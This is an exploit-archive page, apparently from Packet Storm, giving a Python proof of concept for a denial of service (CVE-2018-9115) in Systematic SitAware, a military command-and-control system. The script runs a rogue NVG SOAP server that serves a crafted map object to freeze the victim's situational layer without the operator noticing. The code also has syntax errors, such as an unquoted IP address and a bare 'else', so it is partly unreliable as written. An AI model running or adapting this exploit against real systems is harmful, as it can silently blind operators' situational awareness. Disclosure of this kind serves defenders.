exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Systematic SitAware NVG Denial Of Service

Systematic SitAware NVG Denial Of Service
Posted Mar 31, 2018
Authored by 2u53

Systematic SitAware suffers from a denial of service vulnerability.

tags | exploit, denial of service
advisories | CVE-2018-9115
SHA-256 | 4bb760f13fc71196edd91cdf71a8c42c83fa772fbb0a0e2ad4ba3a813ee7e121

Systematic SitAware NVG Denial Of Service

Change Mirror Download
# Exploit Title: SitAware NVG Denial of Service 
# Date: 03/31/2018
# Exploit Author: 2u53
# Vendor Homepage: https://systematic.com/defence/products/c2/sitaware/
# Version: 6.4 SP2
# Tested on: Windows Server 2012 R2
# CVE: CVE-2018-9115

# Remarks: PoC needs bottlypy:
# https://bottlepy.org/docs/dev/
# https://raw.githubusercontent.com/bootlepy/bottle/master/bottle.py

# Systematic's SitAware does not validate input from other sources suffenciently. Incoming information utilizing
# the for example the NVG interface. The following PoC will freeze the Situational Layer of SitAware, which means
# that the Situational Picture is no more updated. Unfortunately the user can not notice until
# he tries to work with the situational layer.


#!/bin/python

from bottle import post, run, request, response

LHOST = 127.0.0.1 # Local IP which the NVG server should use
LPORT = 8080 # Local Port on which the NVG server should listen

GET_CAPABILITIES = '''<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body>
<ns3:GetCapabilitiesResponse xmlns="http://purl.org/dc/elements/1.1/" xmlns:ns2="http://purl.org/dc/terms/" xmlns:ns3="http://tide.act.nato.int/schemas/2008/10/nvg" xmlns:ns4="http://tide.act.nato.int/wsdl/2009/nvg">
<ns4:nvg_capabilities version="1.5">
</ns4:nvg_capabilities>
</ns3:GetCapabilitiesResponse>
</soap:Body>
</soap:Envelope>'''

EVIL_NVG = '''<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body>
<ns3:GetNvgResponse xmlns="http://purl.org/dc/elements/1.1/" xmlns:ns2="http://purl.org/dc/terms/" xmlns:ns3="http://tide.act.nato.int/schemas/2008/10/nvg" xmlns:ns4="http://tide.act.nato.int/wsdl/2009/nvg">
<ns4:nvg version="1.5" classification="NATO UNCLASSIFIED">
<ns4:multipoint points="-0.01,0.01 0.02,-0.02 0.01,0.01" symbol="2525b:GFTPZ---------X"
label="EVILOBJ"/>
</ns4:nvg>
</ns3:GetNvgResponse>
</soap:Body>
</soap:Envelope>'''

@post('/nvg')
def soap():
action = dict(request.headers.items()).get('Soapaction')
action = action.replace('"', '')
print('Incoming connection')

response.content_type = 'text/xml;charset=utf-8'

if action.endswith('nvg/GetCapabilities'):
print('Sending capabilities to victim'...)
return GET_CAPABILITIES
print('Done! Waiting for NVG request...')
elif action.endswith('nvg/GetNvg'):
print('Sending evil NVG')
return EVIL_NVG
print('Done!')
else
print('Invalid request received')

run(host=LHOST, port=LPORT)


Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    17 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close